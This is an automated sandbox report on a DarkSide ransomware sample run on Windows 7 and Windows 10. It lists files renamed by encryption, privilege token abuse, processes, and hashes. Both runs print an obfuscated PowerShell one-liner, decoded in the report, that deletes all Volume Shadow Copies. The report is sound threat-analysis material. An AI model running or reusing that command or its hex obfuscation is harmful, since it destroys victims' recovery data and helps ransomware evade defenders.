Malware Analysis Report

2024-10-16 03:28

Sample ID 220124-as4xlsgfhn
Target ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2
SHA256 ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2
Tags
upx darkside ransomware spyware stealer
score
10/10

Analysis Overview

score
10/10

SHA256

ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2

Threat Level: Known bad

The file ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2 was found to be: Known bad.

Malicious Activity Summary

upx darkside ransomware spyware stealer

DarkSide

UPX packed file

Modifies extensions of user files

Reads user/profile data of web browsers

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-01-24 00:29

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-01-24 00:29

Reported

2022-01-24 00:33

Platform

win7-en-20211208

Max time kernel

121s

Max time network

126s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe"

Signatures

DarkSide

ransomware darkside

Modifies extensions of user files

ransomware
Description Indicator Process Target
File opened for modification C:\Users\Admin\Pictures\ShowGrant.tiff C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File renamed C:\Users\Admin\Pictures\ShowGrant.tiff => C:\Users\Admin\Pictures\ShowGrant.tiff.5f7aa573 C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File opened for modification C:\Users\Admin\Pictures\StopSet.tiff C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File opened for modification C:\Users\Admin\Pictures\UnblockExit.tif.5f7aa573 C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File renamed C:\Users\Admin\Pictures\MountGrant.raw => C:\Users\Admin\Pictures\MountGrant.raw.5f7aa573 C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File opened for modification C:\Users\Admin\Pictures\ShowGrant.tiff.5f7aa573 C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File opened for modification C:\Users\Admin\Pictures\MountGrant.raw.5f7aa573 C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File renamed C:\Users\Admin\Pictures\PushUnregister.raw => C:\Users\Admin\Pictures\PushUnregister.raw.5f7aa573 C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File opened for modification C:\Users\Admin\Pictures\UpdateGet.tiff C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File renamed C:\Users\Admin\Pictures\UpdateGet.tiff => C:\Users\Admin\Pictures\UpdateGet.tiff.5f7aa573 C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File renamed C:\Users\Admin\Pictures\UnblockExit.tif => C:\Users\Admin\Pictures\UnblockExit.tif.5f7aa573 C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File opened for modification C:\Users\Admin\Pictures\UpdateGet.tiff.5f7aa573 C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File renamed C:\Users\Admin\Pictures\ExpandGet.png => C:\Users\Admin\Pictures\ExpandGet.png.5f7aa573 C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File opened for modification C:\Users\Admin\Pictures\ExpandGet.png.5f7aa573 C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File opened for modification C:\Users\Admin\Pictures\PushUnregister.raw.5f7aa573 C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File renamed C:\Users\Admin\Pictures\StopSet.tiff => C:\Users\Admin\Pictures\StopSet.tiff.5f7aa573 C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File opened for modification C:\Users\Admin\Pictures\StopSet.tiff.5f7aa573 C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A

Reads user/profile data of web browsers

spyware stealer

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe

"C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"

The hex string above decodes byte by byte to `Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}`, i.e. deletion of all Volume Shadow Copies via WMI; this is what drives the vssvc.exe privilege use (SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege) recorded in the AdjustPrivilegeToken signature above.

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

N/A

Files

memory/1552-54-0x0000000075601000-0x0000000075603000-memory.dmp

memory/1696-55-0x000007FEFB771000-0x000007FEFB773000-memory.dmp

memory/1696-58-0x00000000027F2000-0x00000000027F4000-memory.dmp

memory/1696-57-0x00000000027F0000-0x00000000027F2000-memory.dmp

memory/1696-59-0x00000000027F4000-0x00000000027F7000-memory.dmp

memory/1696-56-0x000007FEF29D0000-0x000007FEF352D000-memory.dmp

memory/1696-60-0x000000001B6E0000-0x000000001B9DF000-memory.dmp

memory/1696-61-0x00000000027FB000-0x000000000281A000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 a55d404d2972c77172e51b976db41eb5
SHA1 ebe4d7d5f11f2452aca4af51776c92c18ca70030
SHA256 c2a013beaa4cac7ef2bbc64348dc39323f7ba8c86cd82fbe1b7b34de4455c721
SHA512 43b898bd5c6b638756586db82d645e87d882dfbc2c6130012aa2c623e17f3a8fb24ef69b57d134e1f54f4dbcac20053424365955ff6da1f437e4548a2cc6f14d

Analysis: behavioral2

Detonation Overview

Submitted

2022-01-24 00:29

Reported

2022-01-24 00:33

Platform

win10-en-20211208

Max time kernel

122s

Max time network

140s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe"

Signatures

DarkSide

ransomware darkside

Modifies extensions of user files

ransomware
Description Indicator Process Target
File renamed C:\Users\Admin\Pictures\AssertRedo.raw => C:\Users\Admin\Pictures\AssertRedo.raw.e6bf91d8 C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File opened for modification C:\Users\Admin\Pictures\AssertRedo.raw.e6bf91d8 C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File renamed C:\Users\Admin\Pictures\UseCompare.png => C:\Users\Admin\Pictures\UseCompare.png.e6bf91d8 C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File opened for modification C:\Users\Admin\Pictures\UseCompare.png.e6bf91d8 C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File opened for modification C:\Users\Admin\Pictures\ExitResume.raw.e6bf91d8 C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File opened for modification C:\Users\Admin\Pictures\LimitGrant.crw.e6bf91d8 C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File renamed C:\Users\Admin\Pictures\RegisterSwitch.crw => C:\Users\Admin\Pictures\RegisterSwitch.crw.e6bf91d8 C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File opened for modification C:\Users\Admin\Pictures\RegisterSwitch.crw.e6bf91d8 C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File opened for modification C:\Users\Admin\Pictures\BlockMount.tiff C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File renamed C:\Users\Admin\Pictures\BlockMount.tiff => C:\Users\Admin\Pictures\BlockMount.tiff.e6bf91d8 C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File renamed C:\Users\Admin\Pictures\LimitGrant.crw => C:\Users\Admin\Pictures\LimitGrant.crw.e6bf91d8 C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File opened for modification C:\Users\Admin\Pictures\BlockMount.tiff.e6bf91d8 C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File renamed C:\Users\Admin\Pictures\ConvertFromInvoke.png => C:\Users\Admin\Pictures\ConvertFromInvoke.png.e6bf91d8 C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File opened for modification C:\Users\Admin\Pictures\ConvertFromInvoke.png.e6bf91d8 C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File renamed C:\Users\Admin\Pictures\ExitResume.raw => C:\Users\Admin\Pictures\ExitResume.raw.e6bf91d8 C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A

Reads user/profile data of web browsers

spyware stealer

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: 36 N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe

"C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"

The hex string above decodes to `Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}`, i.e. deletion of all Volume Shadow Copies via WMI, which accounts for the vssvc.exe activity in this detonation.

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

Country Destination Domain Proto
NL 104.80.224.57:443 tcp

Files

memory/3824-121-0x000001EE562F0000-0x000001EE56312000-memory.dmp

memory/3824-124-0x000001EE564F0000-0x000001EE56566000-memory.dmp

memory/3824-141-0x000001EE3E1F0000-0x000001EE56370000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 ea6243fdb2bfcca2211884b0a21a0afc
SHA1 2eee5232ca6acc33c3e7de03900e890f4adf0f2f
SHA256 5bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8
SHA512 189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5be7815b906bb543891425997ac1f096
SHA1 596d6d0bc1d75bbe360aa154b1e61389eacaad1b
SHA256 9005ab6429d6b7277a6eb71da0d99cd2cfe11de1e513e331adda1885636f943e
SHA512 25ae960ab6a87c029784c3cd6413995aa2217a82c0d6a1b198553cd75a2088bc1f56d05bf8981260f5a3449f94a2057d51889f7d15c41f0b5a4170a22ef5d037

memory/3824-145-0x000001EE3E1F0000-0x000001EE56370000-memory.dmp